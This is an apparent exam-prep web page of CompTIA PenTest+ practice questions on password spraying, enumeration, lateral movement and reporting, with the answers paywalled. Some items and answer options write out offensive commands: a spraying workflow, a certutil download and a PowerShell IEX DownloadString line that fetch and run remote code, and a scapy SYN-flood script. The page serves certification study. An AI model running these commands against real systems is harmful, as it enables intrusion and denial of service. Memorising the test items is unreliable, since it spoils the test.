ExamGecko
Login
Home / CompTIA / PT0-003 / List of questions
Ask Question

CompTIA PT0-003 Practice Test - Questions Answers, Page 23

Add to Whishlist

List of questions

Question 221

Report Export Collapse

[Attacks and Exploits]

A penetration tester is preparing a password-spraying attack against a known list of users for the company 'example'. The tester is using the following list of commands:

pw-inspector -i sailwords -t 8 -S pass

spray365.py spray -ep plan

users='~/user.txt'; allwords='~/words.txt'; pass='~/passwords.txt'; plan='~/spray.plan'

spray365.py generate --password-file $pass --userfile $user --domain 'example.com' --execution-plan $plan

cew -m 5 'http://www.example.com' -w sailwords

Which of the following is the correct order for the list of the commands?

Become a Premium Member for full access
  Unlock Premium Member

Question 222

Report Export Collapse

[Attacks and Exploits]

Which of the following methods should a physical penetration tester employ to access a rarely used door that has electronic locking mechanisms?

Become a Premium Member for full access
  Unlock Premium Member

Question 223

Report Export Collapse

With one day left to complete the testing phase of an engagement, a penetration tester obtains the following results from an Nmap scan:

Not shown: 1670 closed ports

PORT STATE SERVICE VERSION

80/tcp open http Apache httpd 2.2.3 (CentOS)

3306/tcp open mysql MySQL (unauthorized)

8888/tcp open http lighttpd 1.4.32

Which of the following tools should the tester use to quickly identify a potential attack path?

Become a Premium Member for full access
  Unlock Premium Member

Question 224

Report Export Collapse

[Attacks and Exploits]

A penetration tester wants to send a specific network packet with custom flags and sequence numbers to a vulnerable target. Which of the following should the tester use?

Become a Premium Member for full access
  Unlock Premium Member

Question 225

Report Export Collapse

[Attacks and Exploits]

Which of the following frameworks can be used to classify threats?

Become a Premium Member for full access
  Unlock Premium Member

Question 226

Report Export Collapse

[Information Gathering and Vulnerability Scanning]

A penetration tester is enumerating a Linux system. The goal is to modify the following script to provide more comprehensive system information:

#!/bin/bash

ps aux >> linux_enum.txt

Which of the following lines would provide the most comprehensive enumeration of the system?

Become a Premium Member for full access
  Unlock Premium Member

Question 227

Report Export Collapse

[Reporting and Communication]

Which of the following components should a penetration tester include in the final assessment report?

Become a Premium Member for full access
  Unlock Premium Member

Question 228

Report Export Collapse

[Reporting and Communication]

Which of the following elements of a penetration test report can be used to most effectively prioritize the remediation efforts for all the findings?

Become a Premium Member for full access
  Unlock Premium Member

Question 229

Report Export Collapse

[Tools and Code Analysis]

A penetration tester compromises a Windows OS endpoint that is joined to an Active Directory local environment. Which of the following tools should the tester use to manipulate authentication mechanisms to move laterally in the network?

Become a Premium Member for full access
  Unlock Premium Member

Question 230

Report Export Collapse

[Reporting and Communication]

Which of the following components should a penetration tester include in an assessment report?

Become a Premium Member for full access
  Unlock Premium Member
Total 240 questions
Go to page: of 24
Search
Open VPLUS File
Convert VPLUS to PDF

Related questions

A penetration tester gains initial access to a target system by exploiting a recent RCE vulnerability. The patch for the vulnerability will be deployed at the end of the week. Which of the following utilities would allow the tester to reenter the system remotely after the patch has been deployed? (Select two).
A penetration tester gains initial access to an endpoint and needs to execute a payload to obtain additional access. Which of the following commands should the penetration tester use? https://192.168.0.1/foo.exe A. powershell.exe impo C:\tools\foo.ps1 B. certutil.exe -f https://192.168.0.1/foo.exe bad.exe C. powershell.exe -noni -encode IEX.Downloadstring(' http://172.16.0.1/ ') D. rundll32.exe c:\path\foo.dll,functName</a>
During a security audit, a penetration tester wants to run a process to gather information about a target network's domain structure and associated IP addresses. Which of the following tools should the tester use?
Which of the following describes the process of determining why a vulnerability scanner is not providing results?
During a penetration test, a tester attempts to pivot from one Windows 10 system to another Windows system. The penetration tester thinks a local firewall is blocking connections. Which of the following command-line utilities built into Windows is most likely to disable the firewall?
A penetration tester assesses a complex web application and wants to explore potential security weaknesses by searching for subdomains that might have existed in the past. Which of the following tools should the penetration tester use?
Before starting an assessment, a penetration tester needs to scan a Class B IPv4 network for open ports in a short amount of time. Which of the following is the best tool for this task?
A penetration tester is authorized to perform a DoS attack against a host on a network. Given the following input: ip = IP('192.168.50.2') tcp = TCP(sport=RandShort(), dport=80, flags='S') raw = RAW(b'X'*1024) p = ip/tcp/raw send(p, loop=1, verbose=0) Which of the following attack types is most likely being used in the test?
A penetration tester needs to launch an Nmap scan to find the state of the port for both TCP and UDP services. Which of the following commands should the tester use?
During a security assessment, a penetration tester needs to exploit a vulnerability in a wireless network's authentication mechanism to gain unauthorized access to the network. Which of the following attacks would the tester most likely perform to gain access?